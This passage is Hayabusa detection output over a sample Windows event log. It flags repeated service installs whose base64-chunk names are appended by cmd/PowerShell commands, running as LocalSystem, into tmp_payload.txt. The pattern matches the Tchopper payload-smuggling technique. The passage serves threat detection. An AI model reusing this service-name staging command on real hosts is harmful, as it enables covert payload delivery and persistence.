tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:29.297 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VyYWdlRXZlbnRzIiwgJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgICAgICBSZXR1cm4gJExvZ0luZm8NCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgIH0NCiAgICAgDQog | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:30.766 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgIGNhdGNoIHsNCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5hYmxlIHRvIHNjYW4gJEFnZW50IGV2ZW50IGxvZ3MiDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgJE | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:32.227 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Vycm9yWzBdDQoNCiAgICAgICAgJEVycm9yTGluZU51bWJlciA9ICRFcnJvclswXS5JbnZvY2F0aW9uSW5mby5zY3JpcHRsaW5lbnVtYmVyDQoNCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:33.680 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkNhdWdodCBvbiBsaW5lIG51bWJlcjogJEVycm9yTGluZU51bWJlciINCg0KICAgICAgICBjb250aW51ZQ0KICAgIH0NCn0NCg0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:35.189 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBvdXRwdXQgaW5mbyBmb3IgdGhlIGdpdmVu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:36.641 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGxvZyBldmVudHMgcGVyIHNlY29uZA0KDQojQHBhcmFtICRUb3RhbExvZ0V2ZW50cyAtPiAgVGhlIHRvdGFsICMgb2YgZXZlbnRzIGZvciB0aGUgZ2l2ZW4gbG9nDQoNCiMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:38.089 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0KZnVuY3Rpb24gR2V0LVByb2ZpbGVTdWdnZXN0 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:39.555 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aW9uIHsgcGFyYW0oJEF2Z0V2ZW50c1BlclNlY29uZCkNCg0KICAgIHRyeSB7DQoNCiAgICAgICAgICNQcm9maWxlIHN1Z2VzdGlvbg0KICAgICAgICAgJExvZ1N0YXRzQW5kSW5mbyA9ICIiDQoNCg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:41.021 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KICAgICAgICBJZiAoJEF2Z0V2ZW50c1BlclNlY29uZCAtR0UgMCAtYW5kICRBdmdFdmVudHNQZXJTZWNvbmQgLUxFIDEwMCkgew0KICAgICAgICAgDQogICAgICAgICAgICAkTG9nU3RhdHNBbmRJ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:42.474 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bmZvICs9ICJNU1JQQyAoMC0xMDApIEVQUyBvciBXaW5Db2xsZWN0IERlZmF1bHQgKEVuZHBvaW50KSAoMC01MCkgRVBTYG4iICAgICAgICAgDQogICAgICAgICB9DQogICAgICAgICANCiAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:43.938 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIyBBYm92ZSBIaWdoIEhhdGUNCiAgICAgICAgIElmICgkQXZnRXZlbnRzUGVyU2Vjb25kIC1HVCA2MjUpIHsgDQogICAgICAgICAgICANCiAgICAgICAgICAgICRMb2dTdGF0c0FuZEluZm8gKz0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:16:45.441 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IlN1Z2dlc3RlZCBQcm9maWxlOiBIaWdoIEV2ZW50IFJhdGUgU2VydmVyICgyNTEtNjI1KSBFUFMiDQogICAgICAgICAgICAjJExvZ1N0YXRzQW5kSW5mbyArPSAiTk9URTogTG9nIEV2ZW50IFJhdG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
